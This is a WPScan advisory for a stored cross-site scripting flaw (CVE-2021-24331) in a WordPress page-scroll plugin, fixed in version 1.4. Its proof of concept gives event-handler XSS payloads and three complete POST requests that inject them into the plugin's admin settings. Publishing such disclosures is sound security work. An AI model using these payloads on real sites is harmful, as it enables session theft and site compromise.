WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS

Description

The plugin did not properly sanitise and validate its settings, such as psb_distance, psb_buttonsize, psb_speed, only validating them client side. This could allow high privilege users (such as admin) to set XSS payloads in them

Proof of Concept

### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "

[$] " autofocus=autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13



### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13



### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22

Affects Plugins

smooth-page-scroll-updown-buttons
Fixed in version 1.4

References

CVE
CVE-2021-24331
URL
https://m0ze.ru/vulnerability/[2021-04-24]-[WordPress]-[CWE-79]-Smooth-Scroll-Page-UpDown-Buttons-WordPress-Plugin-v1.3.txt

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

Yes

WPVDB ID
2c7ca586-def8-4723-b779-09d7f37fa1ab

Timeline

Publicly Published

2021-05-17 (about 1 years ago)

Added

2021-05-17 (about 1 years ago)

Last Updated

2021-05-18 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin